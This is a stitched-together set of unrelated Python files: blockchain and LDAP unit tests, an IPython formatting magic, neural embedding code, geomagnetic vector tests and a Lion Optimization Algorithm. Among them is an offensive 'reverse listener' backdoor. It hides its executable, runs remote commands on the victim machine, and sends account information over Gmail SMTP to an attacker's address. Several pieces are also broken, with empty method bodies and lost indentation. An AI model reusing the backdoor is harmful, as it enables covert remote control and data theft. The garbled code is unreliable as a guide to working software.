        self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index + 1)

    def test_unset_ots_key(self):
        m_state = Mock(name='mock State')
        # Set the OTS bitfield, and then try to unset it.
        self.addr_state.set_ots_key(0)
        self.addr_state.unset_ots_key(0, m_state)
        self.assertEqual(self.addr_state.ots_bitfield[0], b'\x00')

    @patch('qrl.core.AddressState.AddressState.transaction_hashes', new_callable=PropertyMock)
    def test_unset_ots_key_counter(self, m_transaction_hashes):
        # unset_ots_key() walks backwards through transaction_hashes and finds the last txhash that used OTS counter
        # index.
        # This assumes that transaction_hashes is sorted in time-ascending order, and that the offending tx
        # has already been removed from transaction_hashes.
        m_transaction_hashes.return_value = ["1st hash", "2nd hash", "3rd hash", "4th hash"]
        m_state = Mock(name='mock State')
        # The user has used some OTS bitfield indexes in a random fashion, and has two OTS counter transactions.
        m_state.get_tx_metadata.side_effect = [
            (Mock(name="4th hash", ots_key=357), "unused"),
            (Mock(name="3rd hash", ots_key=config.dev.max_ots_tracking_index + 3), "unused"),
            (Mock(name="2nd hash", ots_key=952), "unused"),
            (Mock(name="1st hash", ots_key=config.dev.max_ots_tracking_index + 2), "unused")
        ]
        self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 4)  # 8196
        # You must remove the txhash that uses index 8196 from transaction_hashes BEFORE calling this function, as it
        # will walk backwards through the transaction_hashes
        self.addr_state.unset_ots_key(config.dev.max_ots_tracking_index + 4, m_state)
        self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index + 3)

    @patch('qrl.core.AddressState.AddressState.transaction_hashes', new_callable=PropertyMock)
    def test_unset_ots_key_counter_unsorted_transaction_hashes(self, m_transaction_hashes):
        # unset_ots_key() ends up with the wrong OTS counter index if transaction_hashes is not properly sorted.
        m_transaction_hashes.return_value = ["1st hash", "2nd hash", "3rd hash", "4th hash"]
        m_state = Mock(name='mock State')
        # The user has used some OTS bitfield indexes in a random fashion, and has two OTS counter transactions.
        m_state.get_tx_metadata.side_effect = [
            (Mock(name="4th hash", ots_key=357), "unused"),
            (Mock(name="3rd hash", ots_key=config.dev.max_ots_tracking_index + 2), "unused"),
            (Mock(name="2nd hash", ots_key=952), "unused"),
            (Mock(name="1st hash", ots_key=config.dev.max_ots_tracking_index + 3), "unused")
        ][-1::-1]  # reversing the order, as it will be called in reverse order by unset_ots_key
        self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 4)  # 8196
        self.addr_state.unset_ots_key(config.dev.max_ots_tracking_index + 4, m_state)
        # In a perfect world, unset_ots_key should have found "1st hash" and used its ots_key
        # But it found "3rd hash" and used its ots key, thus FAIL.
        self.assertEqual(self.addr_state.ots_counter, config.dev.max_ots_tracking_index + 3)

    def test_ots_key_validation(self):
        """Exercise ots_key_reuse() for every index of a small XMSS tree."""
        random_xmss = get_random_xmss(xmss_height=4)
        addr = AddressState.get_default(random_xmss.address)
        ots_indexes = list(range(0, 2 ** random_xmss.height))
        shuffle(ots_indexes)
        for i in ots_indexes:
            if i < config.dev.max_ots_tracking_index:
                self.assertFalse(addr.ots_key_reuse(i))
            else:
                result = addr.ots_key_reuse(i)
                if i > addr.ots_counter:
                    self.assertFalse(result)
                else:
                    self.assertTrue(result)
            addr.set_ots_key(i)
            self.assertTrue(addr.ots_key_reuse(i))

    def test_ots_key_reuse_counter(self):
        # If the ots counter is 8193, that automatically means index 8192 is used.
        self.addr_state.set_ots_key(config.dev.max_ots_tracking_index + 1)
        self.assertTrue(self.addr_state.ots_key_reuse(config.dev.max_ots_tracking_index))
        # If the ots counter is 8193, that means 8194 and above are not used.
        self.assertFalse(self.addr_state.ots_key_reuse(config.dev.max_ots_tracking_index + 2))

    def test_serialize(self):
        # Simply test that serialize() works and you can deserialize from it.
        output = self.addr_state.serialize()
        another_addr_state = AddressState(protobuf_block=output)
        self.assertIsInstance(another_addr_state, AddressState)

    def test_address_is_valid(self):
        """address_is_valid() accepts a real address and rejects junk bytes."""
        self.assertTrue(AddressState.address_is_valid(alice.address))
        self.assertFalse(AddressState.address_is_valid(b'fake address'))
|
import ldap
from awx.sso.backends import LDAPSettings
from awx.sso.validators import validate_ldap_filter
def test_ldap_default_settings(mocker):
    """LDAPSettings falls back to empty org/team maps when nothing is stored."""
    from_db = mocker.Mock(**{'order_by.return_value': []})
    # mocker.patch applies for the whole test and is NOT a context manager;
    # the previous `with mocker.patch(...)` only "worked" because the patched
    # MagicMock happens to support the context protocol.
    mocker.patch('awx.conf.models.Setting.objects.filter', return_value=from_db)
    settings = LDAPSettings()
    assert settings.ORGANIZATION_MAP == {}
    assert settings.TEAM_MAP == {}
def test_ldap_default_network_timeout(mocker):
    """Default connection options disable referrals and set a 30s timeout."""
    from_db = mocker.Mock(**{'order_by.return_value': []})
    # mocker.patch applies for the whole test and is NOT a context manager.
    mocker.patch('awx.conf.models.Setting.objects.filter', return_value=from_db)
    settings = LDAPSettings()
    assert settings.CONNECTION_OPTIONS == {
        ldap.OPT_REFERRALS: 0,
        ldap.OPT_NETWORK_TIMEOUT: 30
    }
def test_ldap_filter_validator():
    """A filter containing the %(user)s placeholder validates with with_user=True."""
    validate_ldap_filter('(test-uid=%(user)s)', with_user=True)
|
#!/usr/bin/env python
__author__ = "Kharim Mchatta"
#To connect to it upload the script on the victim server
#On your attack machine run the command below:
#nc target-ip target-port
#############################################
# Simple Reverse Listener #
# by Kharim Mchatta #
#############################################
##############################################
# Disclaimer: This code should be used for #
# Education Purpose Only. #
# Any Malicious use of the code would not #
# hold the author responsible. #
##############################################
# -*- coding: utf-8 -*-
# NOTE(review): this is offensive-security demo code (a reverse listener that
# also mails account information over SMTP).  It must never be deployed; it is
# kept only under the educational disclaimer above.  It also mixes Python-2-era
# APIs with Python-3 syntax, so it will not run unmodified on Python 3.
import socket, os, sys, subprocess, smtplib, re
hide = 'attrib +s +h server.exe'  # data hiding Technique (Windows-only)
os.system(hide)
ip = '192.168.1.14'
port = 4444
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((ip, port))
server.listen(5)
print('[*]listening to %s:%d' % (ip, port))
client, addr = server.accept()
print('[*]connected to %s:%d' % (ip, port))
os.chdir('C:\\')  # the program to go to drive C: directly
# Command loop: read a command from the connected peer and dispatch on it.
while True:
    # recieve data from the client
    data = str(client.recv(8192))
    data = data.strip()
    if data[:2].decode("utf-8") == 'cd':
        os.chdir(data[3:].decode("utf-8"))
    elif data.strip() == "exit":
        client.sendall("cheers")
        client.close()
        sys.exit(0)
    else:
        # seneding output to the attacker
        user, output = os.popen4(data)
        client.sendall(output.read() + str(os.getcwd()) + '>')
DEVNULL = open(os.devnull, 'wb')
# sending all user account to the hackers email
mail = "dummyd054@gmail.com"  # replace with your email address
password = "xxxxxxx"  # type your password
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(mail, password)
server.sendmail(mail, mail, password)
user = "net user"  # collecting system user account
profile = subprocess.check_output(user, shell=True, stderr=DEVNULL, stdin=DEVNULL)
profiles = re.findall(br"(?:Profile\s*:\s)(.*)", profile)
os.system(user)
output = ""
for profile in profiles:
    user = 'net user' + 'name=' + '"' + profile.decode('utf-8')
    new = subprocess.check_output(user, shell=True, stderr=DEVNULL, stdin=DEVNULL)
    output = output + new.decode('utf-8')
server.quit()
|
from IPython.core.magic import magics_class, line_cell_magic, Magics
from IPython.core.magic import needs_local_scope
from IPython.display import display, Markdown
@magics_class
class fstringMagic(Magics):
    """IPython magics that render a cell's text as formatted Markdown."""

    def __init__(self, shell, cache_display_data=False):
        # cache_display_data is accepted for API compatibility but unused here.
        super(fstringMagic, self).__init__(shell)

    @line_cell_magic
    def stringformat(self, line, cell):
        """Treat code cell content as f-string."""
        # NOTE(review): despite the docstring this uses str.format() against
        # the user namespace, so only {name} lookups work — not arbitrary
        # f-string expressions.
        return display(Markdown(cell.format(**self.shell.user_ns)))

    @line_cell_magic
    @needs_local_scope
    def fstring(self, line, cell, local_ns):
        """Treat code cell content as f-string."""
        # SECURITY: eval() executes arbitrary code from the cell (inherent to
        # a notebook magic, but worth flagging).  A cell containing ''' will
        # also break the quoting used to build this expression.
        return display(Markdown(eval("f'''" + cell + "'''", local_ns)))
|
import numpy as np
import torch
from torch import nn
import torch.nn.functional as F
from transformer import Embedding
import re
def GraphEmbedding(vocab, embedding_dim, pretrained_file=None, amr=False, dump_file=None):
    """Build an embedding layer for `vocab`, optionally seeded from a file.

    Args:
        vocab: Vocabulary exposing `size`, `padding_idx` and `idx2token(idx)`.
        embedding_dim (int): Dimensionality of each embedding vector.
        pretrained_file (str): Optional path to whitespace-separated vectors
            (one `token v1 ... vN` per line, GloVe-style).
        amr (bool): If True, also match tokens after stripping a trailing
            AMR sense suffix such as `-01`.
        dump_file (str): Optional path; every pretrained line actually used
            is copied there.

    Returns:
        A trainable `nn.Embedding` with the padding row zeroed, or a plain
        transformer `Embedding` when no pretrained file is given.
    """
    if pretrained_file is None:
        return Embedding(vocab.size, embedding_dim, vocab.padding_idx)

    tokens_to_keep = set()
    for idx in range(vocab.size):
        token = vocab.idx2token(idx)
        # TODO: Is there a better way to do this? Currently we have a very specific 'amr' param.
        if amr:
            token = re.sub(r'-\d\d$', '', token)
        tokens_to_keep.add(token)

    embeddings = {}
    dump = open(dump_file, 'w', encoding='utf8') if dump_file is not None else None
    try:
        with open(pretrained_file, encoding='utf8') as embeddings_file:
            # Stream line by line instead of readlines(): pretrained embedding
            # files can be very large.
            for line in embeddings_file:
                fields = line.rstrip().split(' ')
                if len(fields) - 1 != embedding_dim:
                    # Skip header lines / vectors of the wrong width.
                    continue
                token = fields[0]
                if token in tokens_to_keep:
                    if dump is not None:
                        dump.write(line)
                    embeddings[token] = np.asarray(fields[1:], dtype='float32')
    finally:
        # Close the dump file even if reading fails (the original leaked it).
        if dump is not None:
            dump.close()

    all_embeddings = np.asarray(list(embeddings.values()))
    print('pretrained', all_embeddings.shape)
    embeddings_mean = float(np.mean(all_embeddings))
    embeddings_std = float(np.std(all_embeddings))
    # Initialize the weight matrix randomly, then overwrite the rows for which
    # we read a pretrained vector.
    embedding_matrix = torch.FloatTensor(vocab.size, embedding_dim).normal_(embeddings_mean,
                                                                            embeddings_std)
    for i in range(vocab.size):
        token = vocab.idx2token(i)
        # If we don't have a pre-trained vector for this word, we'll just leave this row alone,
        # so the word has a random initialization.
        if token in embeddings:
            embedding_matrix[i] = torch.FloatTensor(embeddings[token])
        elif amr:
            # Fall back to the sense-stripped form of the token.
            normalized_token = re.sub(r'-\d\d$', '', token)
            if normalized_token in embeddings:
                embedding_matrix[i] = torch.FloatTensor(embeddings[normalized_token])
    # The padding row must stay at zero.
    embedding_matrix[vocab.padding_idx].fill_(0.)
    return nn.Embedding.from_pretrained(embedding_matrix, freeze=False)
class RelationEncoder(nn.Module):
def __init__(self, vocab, rel_dim, embed_dim, hidden_size, num_layers, dropout, bidirectional=True):
def forward(self, src_tokens, src_lengths):
class TokenEncoder(nn.Module):
def __init__(self, token_vocab, char_vocab, char_dim, token_dim, embed_dim, filters, char2token_dim, dropout, pretrained_file=None):
def forward(self, token_input, char_input):
class CNNEncoder(nn.Module):
    """Character CNN encoder: parallel 1-D convolutions max-pooled over time,
    followed by a Highway block and a linear projection to `output_dim`."""

    def __init__(self, filters, input_dim, output_dim, highway_layers=1):
        super(CNNEncoder, self).__init__()
        # One Conv1d per (kernel_width, out_channels) pair in `filters`.
        self.convolutions = nn.ModuleList(
            nn.Conv1d(input_dim, out_channels, kernel_size=width)
            for width, out_channels in filters
        )
        total_channels = sum(out_channels for _, out_channels in filters)
        self.highway = Highway(total_channels, highway_layers)
        self.out_proj = nn.Linear(total_channels, output_dim)
        self.reset_parameters()

    def reset_parameters(self):
        """Re-initialize the output projection."""
        nn.init.normal_(self.out_proj.weight, std=0.02)
        nn.init.constant_(self.out_proj.bias, 0.)

    def forward(self, input):
        # input: batch_size x seq_len x input_dim
        channels_first = input.transpose(1, 2)
        # Per filter: convolve, max-pool over the time axis, then ReLU.
        pooled = [F.relu(torch.max(conv(channels_first), -1)[0])
                  for conv in self.convolutions]
        features = self.highway(torch.cat(pooled, dim=-1))
        return self.out_proj(features)  # batch_size x output_dim
|
"""Unit tests for `OMMBV.vector`."""
import numpy as np
import pytest
import OMMBV
from OMMBV import sources
from OMMBV.tests.test_core import gen_data_fixed_alt
class TestVector(object):
    """Unit tests for `OMMBV.vector`."""

    def setup(self):
        """Setup test environment before each function."""
        # Locations to perform tests at
        self.lats, self.longs, self.alts = gen_data_fixed_alt(550.)
        return

    def teardown(self):
        """Clean up test environment after each function."""
        del self.lats, self.longs, self.alts
        return

    @pytest.mark.parametrize("input,output",
                             [([0., 1., 0., 0., 0.], [1.0, 0., 0.]),
                              ([1., 0., 0., 0., 0.], [0., 0., 1.]),
                              ([0., 0., 1., 0., 0.], [0., 1., 0.]),
                              ([1., 0., 0., 0., 90.], [-1., 0., 0.]),
                              ([0., 1., 0., 0., 90.], [0., 0., 1.]),
                              ([0., 0., 1., 0., 90.], [0., 1., 0.]),
                              ([0., 1., 0., 0., 180.], [-1., 0., 0.]),
                              ([1., 0., 0., 0., 180.], [0., 0., -1.]),
                              ([0., 0., 1., 0., 180.], [0., 1., 0.]),
                              ([0., 1., 0., 45., 0.], [1., 0., 0.]),
                              ([1., 0., 0., 45., 0.], [0., -np.cos(np.pi / 4),
                                                       np.cos(np.pi / 4)]),
                              ([0., 0., 1., 45., 0.], [0., np.cos(np.pi / 4),
                                                       np.cos(np.pi / 4)])])
    def test_basic_ecef_to_enu_rotations(self, input, output):
        """Test ECEF to ENU Vector Rotations."""
        ve, vn, vu = OMMBV.vector.ecef_to_enu(*input)
        np.testing.assert_allclose(ve, output[0], atol=1E-9)
        np.testing.assert_allclose(vn, output[1], atol=1E-9)
        np.testing.assert_allclose(vu, output[2], atol=1E-9)
        return

    @pytest.mark.parametrize("input,output", [([1., 0., 0., 0., 0.],
                                               [0., 1., 0.]),
                                              ([0., 0., 1., 0., 0.],
                                               [1., 0., 0.]),
                                              ([0., 1., 0., 0., 0.],
                                               [0., 0., 1.]),
                                              ([1., 0., 0., 0., 90.],
                                               [-1., 0., 0.]),
                                              ([0., 0., 1., 0., 90.],
                                               [0., 1., 0.]),
                                              ([0., 1., 0., 0., 90.],
                                               [0., 0., 1.]),
                                              ([1., 0., 0., 0., 180.],
                                               [0., -1., 0.]),
                                              ([0., 0., 1., 0., 180.],
                                               [-1., 0., 0.]),
                                              ([0., 1., 0., 0., 180.],
                                               [0., 0., 1.])])
    def test_basic_enu_to_ecef_rotations(self, input, output):
        """Test ENU to ECEF rotations."""
        vx, vy, vz = OMMBV.vector.enu_to_ecef(*input)
        np.testing.assert_allclose(vx, output[0], atol=1E-9)
        np.testing.assert_allclose(vy, output[1], atol=1E-9)
        np.testing.assert_allclose(vz, output[2], atol=1E-9)
        return

    def test_ecef_to_enu_back_to_ecef(self):
        """Test ECEF-ENU-ECEF."""
        vx = 0.9
        vy = 0.1
        # NOTE(review): a unit vector would need 1 - vx**2 - vy**2 here; the
        # round-trip check below does not require |v| == 1, so any vector
        # works — confirm whether unit magnitude was intended.
        vz = np.sqrt(1. - vx ** 2 + vy ** 2)
        for lat, lon, alt in zip(self.lats, self.longs, self.alts):
            vxx, vyy, vzz = OMMBV.vector.ecef_to_enu(vx, vy, vz, lat,
                                                     lon)
            vxx, vyy, vzz = OMMBV.vector.enu_to_ecef(vxx, vyy, vzz, lat,
                                                     lon)
            np.testing.assert_allclose(vx, vxx, atol=1E-9)
            np.testing.assert_allclose(vy, vyy, atol=1E-9)
            np.testing.assert_allclose(vz, vzz, atol=1E-9)
        return

    def test_enu_to_ecef_back_to_enu(self):
        """Test ENU-ECEF-ENU."""
        vx = 0.9
        vy = 0.1
        # NOTE(review): see magnitude note in test_ecef_to_enu_back_to_ecef.
        vz = np.sqrt(1. - vx ** 2 + vy ** 2)
        for lat, lon, alt in zip(self.lats, self.longs, self.alts):
            vxx, vyy, vzz = OMMBV.vector.enu_to_ecef(vx, vy, vz, lat,
                                                     lon)
            vxx, vyy, vzz = OMMBV.vector.ecef_to_enu(vxx, vyy, vzz, lat,
                                                     lon)
            np.testing.assert_allclose(vx, vxx, atol=1E-9)
            np.testing.assert_allclose(vy, vyy, atol=1E-9)
            np.testing.assert_allclose(vz, vzz, atol=1E-9)
        return

    def test_igrf_end_to_ecef_back_to_end(self):
        """Check consistency ENU-ECEF and IGRF implementation."""
        vx = 0.9
        vy = 0.1
        # NOTE(review): see magnitude note in test_ecef_to_enu_back_to_ecef.
        vz = np.sqrt(1. - vx ** 2 + vy ** 2)
        vz = -vz
        for lat, lon, alt in zip(self.lats, self.longs, self.alts):
            # Input here is co-latitude, not latitude.
            # Inputs to fortran are in radians.
            vxx, vyy, vzz = sources.end_vector_to_ecef(vx, vy, vz,
                                                       np.deg2rad(90. - lat),
                                                       np.deg2rad(lon))
            vx2, vy2, vz2 = OMMBV.vector.enu_to_ecef(vx, vy, -vz, lat,
                                                     lon)
            np.testing.assert_allclose(vxx, vx2, atol=1E-9)
            np.testing.assert_allclose(vyy, vy2, atol=1E-9)
            np.testing.assert_allclose(vzz, vz2, atol=1E-9)
            vxx, vyy, vzz = OMMBV.vector.ecef_to_enu(vxx, vyy, vzz, lat,
                                                     lon)
            # Convert upward component back to down
            vzz = -vzz
            # Compare original inputs to outputs
            np.testing.assert_allclose(vx, vxx, atol=1E-9)
            np.testing.assert_allclose(vy, vyy, atol=1E-9)
            np.testing.assert_allclose(vz, vzz, atol=1E-9)
        return

    @pytest.mark.parametrize("input", [[22., 36., 42.],
                                       [np.array([1., 2., 3.]),
                                        np.array([4., 5., 6.]),
                                        np.array([7., 8., 9.])]])
    def test_normalize(self, input):
        """Test `OMMBV.vector.normalize` normalizes."""
        x, y, z = OMMBV.vector.normalize(*input)
        # Ensure unit magnitude
        unit_mag = np.sqrt(x**2 + y**2 + z**2)
        np.testing.assert_allclose(unit_mag, 1, atol=1E-9)
        # Check against each component
        mag = np.sqrt(input[0]**2 + input[1]**2 + input[2]**2)
        np.testing.assert_allclose(input[0], mag * x, atol=1E-9)
        np.testing.assert_allclose(input[1], mag * y, atol=1E-9)
        np.testing.assert_allclose(input[2], mag * z, atol=1E-9)
        return

    @pytest.mark.parametrize("input1,input2,output",([[1., 0., 0.],
                                                      [0., 1., 0.],
                                                      [0., 0., 1.]],
                                                     [[np.ones(3), np.zeros(3),
                                                       np.zeros(3)],
                                                      [np.zeros(3), np.ones(3),
                                                       np.zeros(3)],
                                                      [np.zeros(3), np.zeros(3),
                                                       np.ones(3)]]))
    def test_cross_product(self, input1, input2, output):
        """Test `OMMBV.vector.cross_product`."""
        x, y, z = OMMBV.vector.cross_product(*input1, *input2)
        np.testing.assert_allclose(output[0], x, atol=1E-9)
        np.testing.assert_allclose(output[1], y, atol=1E-9)
        np.testing.assert_allclose(output[2], z, atol=1E-9)
        return

    @pytest.mark.parametrize("input_vec,input_basis,output", [([1., 0., 0],
                                                               [0., 1., 0.,
                                                                -1., 0., 0.,
                                                                0., 0., 1.],
                                                               [0., -1., 0.])])
    def test_project_onto_basis(self, input_vec, input_basis, output):
        """Test `OMMBV.vector.project_onto_basis`."""
        x, y, z = OMMBV.vector.project_onto_basis(*input_vec, *input_basis)
        np.testing.assert_allclose(output[0], x, atol=1E-9)
        np.testing.assert_allclose(output[1], y, atol=1E-9)
        np.testing.assert_allclose(output[2], z, atol=1E-9)
        return
|
"""Lion Optimization Algorithm.
"""
import copy
import itertools
import numpy as np
import opytimizer.math.distribution as d
import opytimizer.math.general as g
import opytimizer.math.random as r
import opytimizer.utils.constant as c
import opytimizer.utils.exception as e
import opytimizer.utils.logging as l
from opytimizer.core import Agent, Optimizer
logger = l.get_logger(__name__)
class Lion(Agent):
    """A Lion class complements its inherited parent with additional information needed by
    the Lion Optimization Algorithm.
    """

    def __init__(self, n_variables, n_dimensions, lower_bound, upper_bound, position, fit):
        """Initialization method.
        Args:
            n_variables (int): Number of decision variables.
            n_dimensions (int): Number of dimensions.
            lower_bound (list, tuple, np.array): Minimum possible values.
            upper_bound (list, tuple, np.array): Maximum possible values.
            position (np.array): Position array.
            fit (float): Fitness value.
        """
        # Overrides its parent class with the receiving params
        super(Lion, self).__init__(n_variables, n_dimensions, lower_bound, upper_bound)
        # Copies the current position and fitness to overrided object
        self.position = copy.deepcopy(position)
        self.fit = copy.deepcopy(fit)
        # Best position
        self.best_position = copy.deepcopy(position)
        # Previous fitness
        self.p_fit = copy.deepcopy(fit)
        # Whether lion is nomad or not
        self.nomad = False
        # Whether lion is female or not
        self.female = False
        # Index of pride
        self.pride = 0
        # Index of hunting group
        self.group = 0

    @property
    def best_position(self):
        """np.array: N-dimensional array of best positions.
        """
        return self._best_position

    @best_position.setter
    def best_position(self, best_position):
        if not isinstance(best_position, np.ndarray):
            raise e.TypeError('`best_position` should be a numpy array')
        self._best_position = best_position

    @property
    def p_fit(self):
        """float: Previous fitness value.
        """
        return self._p_fit

    @p_fit.setter
    def p_fit(self, p_fit):
        if not isinstance(p_fit, (float, int, np.int32, np.int64)):
            raise e.TypeError('`p_fit` should be a float or integer')
        self._p_fit = p_fit

    @property
    def nomad(self):
        """bool: Whether lion is nomad or not.
        """
        return self._nomad

    @nomad.setter
    def nomad(self, nomad):
        if not isinstance(nomad, bool):
            raise e.TypeError('`nomad` should be a boolean')
        self._nomad = nomad

    @property
    def female(self):
        """bool: Whether lion is female or not.
        """
        return self._female

    @female.setter
    def female(self, female):
        if not isinstance(female, bool):
            raise e.TypeError('`female` should be a boolean')
        self._female = female

    @property
    def pride(self):
        """int: Index of pride.
        """
        return self._pride

    @pride.setter
    def pride(self, pride):
        if not isinstance(pride, int):
            raise e.TypeError('`pride` should be an integer')
        if pride < 0:
            # Zero is a valid index; only negatives are rejected, so the
            # message must say ">= 0" (it previously said "> 0").
            raise e.ValueError('`pride` should be >= 0')
        self._pride = pride

    @property
    def group(self):
        """int: Index of hunting group.
        """
        return self._group

    @group.setter
    def group(self, group):
        if not isinstance(group, int):
            raise e.TypeError('`group` should be an integer')
        if group < 0:
            # Zero is a valid index; only negatives are rejected, so the
            # message must say ">= 0" (it previously said "> 0").
            raise e.ValueError('`group` should be >= 0')
        self._group = group
class LOA(Optimizer):
"""An LOA class, inherited from Optimizer.
This is the designed class to define LOA-related
variables and methods.
References:
M. Yazdani and F. Jolai. Lion Optimization Algorithm (LOA): A nature-inspired metaheuristic algorithm.
Journal of Computational Design and Engineering (2016).
"""
def __init__(self, params=None):
"""Initialization method.
Args:
params (dict): Contains key-value parameters to the meta-heuristics.
"""
logger.info('Overriding class: Optimizer -> LOA.')
# Overrides its parent class with the receiving params
super(LOA, self).__init__()
# Percentage of nomad lions
self.N = 0.2
# Number of prides
self.P = 4
# Percentage of female lions
self.S = 0.8
# Percentage of roaming lions
self.R = 0.2
# Immigrate rate
self.I = 0.4
# Mating probability
self.Ma = 0.3
# Mutation probability
self.Mu = 0.2
# Builds the class
self.build(params)
logger.info('Class overrided.')
@property
def N(self):
"""float: Percentage of nomad lions.
"""
return self._N
@N.setter
def N(self, N):
if not isinstance(N, (float, int)):
raise e.TypeError('`N` should be a float or integer')
if N < 0 or N > 1:
raise e.ValueError('`N` should be between 0 and 1')
self._N = N
@property
def P(self):
"""int: Number of prides.
"""
return self._P
@P.setter
def P(self, P):
if not isinstance(P, int):
raise e.TypeError('`P` should be an integer')
if P <= 0:
raise e.ValueError('`P` should be > 0')
self._P = P
@property
def S(self):
"""float: Percentage of female lions.
"""
return self._S
@S.setter
def S(self, S):
if not isinstance(S, (float, int)):
raise e.TypeError('`S` should be a float or integer')
if S < 0 or S > 1:
raise e.ValueError('`S` should be between 0 and 1')
self._S = S
@property
def R(self):
"""float: Percentage of roaming lions.
"""
return self._R
@R.setter
def R(self, R):
if not isinstance(R, (float, int)):
raise e.TypeError('`R` should be a float or integer')
if R < 0 or R > 1:
raise e.ValueError('`R` should be between 0 and 1')
self._R = R
@property
def I(self):
"""float: Immigrate rate.
"""
return self._I
@I.setter
def I(self, I):
if not isinstance(I, (float, int)):
raise e.TypeError('`I` should be a float or integer')
if I < 0 or I > 1:
raise e.ValueError('`I` should be between 0 and 1')
self._I = I
@property
def Ma(self):
"""float: Mating probability.
"""
return self._Ma
@Ma.setter
def Ma(self, Ma):
if not isinstance(Ma, (float, int)):
raise e.TypeError('`Ma` should be a float or integer')
if Ma < 0 or Ma > 1:
raise e.ValueError('`Ma` should be between 0 and 1')
self._Ma = Ma
@property
def Mu(self):
"""float: Mutation probability.
"""
return self._Mu
@Mu.setter
def Mu(self, Mu):
if not isinstance(Mu, (float, int)):
raise e.TypeError('`Mu` should be a float or integer')
if Mu < 0 or Mu > 1:
raise e.ValueError('`Mu` should be between 0 and 1')
self._Mu = Mu
def compile(self, space):
"""Compiles additional information that is used by this optimizer.
Args:
space (Space): A Space object containing meta-information.
"""
# Replaces the current agents with a derived Lion structure
space.agents = [Lion(agent.n_variables, agent.n_dimensions, agent.lb,
agent.ub, agent.position, agent.fit) for agent in space.agents]
# Calculates the number of nomad lions and their genders
n_nomad = int(self.N * space.n_agents)
nomad_gender = d.generate_bernoulli_distribution(1 - self.S, n_nomad)
# Iterates through all possible nomads
for i, agent in enumerate(space.agents[:n_nomad]):
# Toggles to `True` the nomad property
agent.nomad = True
# Defines the gender according to Bernoulli distribution
agent.female = bool(nomad_gender[i])
# Calculates the gender of pride lions
pride_gender = d.generate_bernoulli_distribution(self.S, space.n_agents - n_nomad)
# Iterates through all possible prides
for i, agent in enumerate(space.agents[n_nomad:]):
# Defines the gender according to Bernoulli distribution
agent.female = bool(pride_gender[i])
# Allocates to the corresponding pride
agent.pride = i % self.P
def _get_nomad_lions(self, agents):
"""Gets all nomad lions.
Args:
agents (list): Agents.
Returns:
A list of nomad lions.
"""
# Returns a list of nomad lions
return [agent for agent in agents if agent.nomad]
def _get_pride_lions(self, agents):
"""Gets all non-nomad (pride) lions.
Args:
agents (list): Agents.
Returns:
A list of lists, where each one indicates a particular pride with its lions.
"""
# Gathers all non-nomad lions
agents = [agent for agent in agents if not agent.nomad]
# Returns a list of lists of prides
return [[agent for agent in agents if agent.pride == i] for i in range(self.P)]
def _hunting(self, prides, function):
    """Performs the hunting procedure (s. 2.2.2).

    Females are split into three hunting groups that encircle a "prey"
    (the mean position of the group-0 lions); whenever a hunter improves,
    the prey is pushed further away from it.

    Args:
        prides (list): List of prides holding their corresponding lions.
        function (Function): A Function object that will be used as the objective function.
    """
    # Iterates through all prides
    for pride in prides:
        # Iterates through all agents in pride
        for agent in pride:
            # If agent is female
            if agent.female:
                # Allocates to a random hunting group
                # (presumably 0-3; group 0 joins the prey — TODO confirm)
                agent.group = r.generate_integer_random_number(high=4)
            # If agent is male
            else:
                # Allocates to a null group (no-hunting)
                agent.group = 0
        # Calculates the fitness sum of first, second and third groups
        first_group = np.sum([agent.fit for agent in pride if agent.group == 1])
        second_group = np.sum([agent.fit for agent in pride if agent.group == 2])
        third_group = np.sum([agent.fit for agent in pride if agent.group == 3])
        # Averages the position of the prey (lions in group 0)
        # NOTE(review): males also fall in group 0, so they contribute to the
        # prey position as well — confirm against the reference paper.
        prey = np.mean([agent.position for agent in pride if agent.group == 0], axis=0)
        # Calculates the group indexes and their corresponding
        # positions: center, left and right
        groups_idx = np.argsort([first_group, second_group, third_group]) + 1
        center = groups_idx[0]
        left = groups_idx[1]
        right = groups_idx[2]
        # Iterates through all agents in pride
        for agent in pride:
            # If agent belongs to the center group
            if agent.group == center:
                # Iterates through all decision variables
                for j in range(agent.n_variables):
                    # If agent's position is smaller than prey's
                    if agent.position[j] < prey[j]:
                        # Updates its position (eq. 5 - top)
                        agent.position[j] = r.generate_uniform_random_number(
                            agent.position[j], prey[j])
                    else:
                        # Updates its position (eq. 5 - bottom)
                        agent.position[j] = r.generate_uniform_random_number(
                            prey[j], agent.position[j])
            # If agent belongs to the left or right groups
            if agent.group in [left, right]:
                # Iterates through all decision variables
                for j in range(agent.n_variables):
                    # Calculates the encircling position (reflection through prey)
                    encircling = 2 * prey[j] - agent.position[j]
                    # If encircling's position is smaller than prey's
                    if encircling < prey[j]:
                        # Updates its position (eq. 4 - top)
                        agent.position[j] = r.generate_uniform_random_number(
                            encircling, prey[j])
                    else:
                        # Updates its position (eq. 4 - bottom)
                        agent.position[j] = r.generate_uniform_random_number(
                            prey[j], encircling)
            # Clips their limits
            agent.clip_by_bound()
            # Defines the previous fitness and calculates the newer one
            agent.p_fit = copy.deepcopy(agent.fit)
            agent.fit = function(agent.position)
            # If new fitness is better than old one
            if agent.fit < agent.p_fit:
                # Updates its best position
                agent.best_position = copy.deepcopy(agent.position)
                # Calculates the probability of improvement
                # (assumes non-negative fitness so the ratio lies in [0, 1]
                # — TODO confirm)
                p_improvement = agent.fit / agent.p_fit
                # Updates the prey's position: it flees away from the hunter
                r1 = r.generate_uniform_random_number()
                prey += r1 * p_improvement * (prey - agent.position)
def _moving_safe_place(self, prides):
    """Move prides to safe locations (s. 2.2.3).

    Non-hunting females (group 0) move toward a tournament-selected
    pride member along a randomized direction.

    Args:
        prides (list): List of prides holding their corresponding lions.
    """
    # Iterates through all prides
    for pride in prides:
        # Calculates the number of improved lions (eq. 7)
        n_improved = np.sum([1 for agent in pride if agent.fit < agent.p_fit])
        # Calculates the fitness of lions (eq. 8)
        fitnesses = [agent.fit for agent in pride]
        # Calculates the size of tournament (eq. 9); never below 2
        tournament_size = np.maximum(2, int(np.ceil(n_improved / 2)))
        # Iterates through all agents in pride
        for agent in pride:
            # If agent is female and belongs to group 0
            if agent.group == 0 and agent.female:
                # Gathers the winning lion from tournament selection
                # (`w` is an index into `pride`)
